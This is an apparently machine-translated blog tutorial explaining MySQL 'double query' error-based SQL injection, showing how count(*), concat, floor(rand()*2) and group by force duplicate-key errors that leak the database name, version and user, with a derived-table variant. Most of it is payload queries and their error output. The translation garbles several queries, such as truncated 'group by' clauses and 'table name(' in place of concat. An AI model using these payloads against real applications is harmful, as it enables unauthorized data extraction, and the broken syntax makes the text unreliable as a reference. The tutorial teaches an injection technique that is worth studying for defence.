Dual-query Injection

In the previous article: http://www.bkjia.com/Article/201302/190763.html

I said it is difficult to clarify the double query. I will try to explain it this time. I read some principles. Then try to make it clear to everyone ..

Before that, we understand that the keyword of the query is select, which is known to all. Subqueries can be simply understood as a select statement and a select statement. The select statement is a subquery.

Let's look at a simple example:
Select concat (select database ()));

In actual execution, the subquery is performed first. Therefore, executing the select database () Statement will find the current database and pass the result to the concat function. This function is used for connection. For example, for concat ('A', 'B'), the result is AB. Principle: For dual-injection queries, you need to understand four functions/statements. 1. rand () // random function 2. floor () // get the entire function 3. count () // aggregate function 4. group by clause // the principle of a simple Group statement is that researchers have found that when an aggregate function, for example, if the count function is followed by a grouping statement, part of the query is displayed incorrectly. Take a local database named Security as an example. First, enter
Mysql-u root-p toor will connect to the database.

Then you can switch to the security database through use security. Because one server may have multiple databases.

 

Then we will execute the preceding simple subquery example SELECT concat (select database (); to display security, that is, the name of the current database. Then let's test the usage of concat. Input SELECT concat ('string1', 'string2 ');

Apparently, the result is string1string2.

Then let's test what the random function rand () is doing.

 

Select rand (); how many times do we execute

We can see that this function returns a number greater than 0 and less than 1, and then look at the entire function Select floor (1.1123456 );

 

This function returns an integer smaller than or equal to the number you entered.

 

Then let's look at a simple combination of double injection queries. We can see from my previous article that a subquery is SELECT floor (rand () * 2. Rand () returns a decimal number greater than 0 and less than 1. After multiplied by 2, the number is smaller than 0 and less than 2. Then obtain the result. It can only be 0 or 1. That is, the result of this query is not 1, or 0, which makes it a little more difficult. Look at this query select concat (SELECT database (), FLOOR (RAND () * 2); do not be afraid. First look at the SELECT database () at the bottom and return the database name. Here is security. Then FLOOR (RAND () * 2) is mentioned above. If it is not 0, it is 1. Connect the two results to concat, then the result is either security0 or security1.

If we add the from table name to the end of this statement. Generally, a set of security0 or security1 is returned. The number is determined by the number of results in the table. For example, a table has five Administrators. This will return five records. Here, there are 13 users in the users table, so 13 records are returned.

If it is from information_schema.schemata, This table contains all the database names of mysql. The local machine has three databases. Therefore, three results are returned.

Now we are going to add the Group By statement.
We use the information_schema.tables or information_schema.columns tables to query. Because the table contains a lot of data. It is easy to generate many random values, not all of which are security0, so that the query results cannot be obtained.

Select concat (select database (), floor (rand () * 2) as a from information_schema.tables group by a; here I will explain it first.
We take the result of concat (select database (), floor (rand () * 2) as an alias a, and then use it for grouping. In this way, the same security0 is assigned to one group, and security1 is assigned to one group. There are two results left.

Note that the database () here can be replaced with any function you want to query, such as version (), user (), datadir () or other queries. For example, look up the table. Check the column. The principles are the same.

The last highlight is coming .. Input this line: note that an aggregate function count (*) select count (*), concat (select database (), floor (rand () * 2) is added )) as a from information_schema.tables group by;

Error reported

 

ERROR 1062 (23000): Duplicate entry 'security1' for key'group _ key' Duplicate key values. We can see that security is the result of our query. We want to query the version as follows: select count (*), concat (select version (), floor (rand () * 2) as a from information_schema.tables group by;
Check if the database () is replaced with version ()

Let's look at another one.

 

Select count (*), concat ('~ ', (Select user ()),'~ ', Floor (rand () * 2) as a from information_schema.tables group by a; ERROR 1062 (23000): Duplicate entry '~ Root @ localhost ~ 1 'for key' group _ key' here ~ This symbol is only used to make the results clearer. There is also a complicated one here. It is called a derived table. Select 1 from (table name ('~ ', (Select user ()),'~ ', Floor (rand () * 2) as a from information_schema.tables group by a) x; to report an error. You can refer to my previous article. I believe it is clear.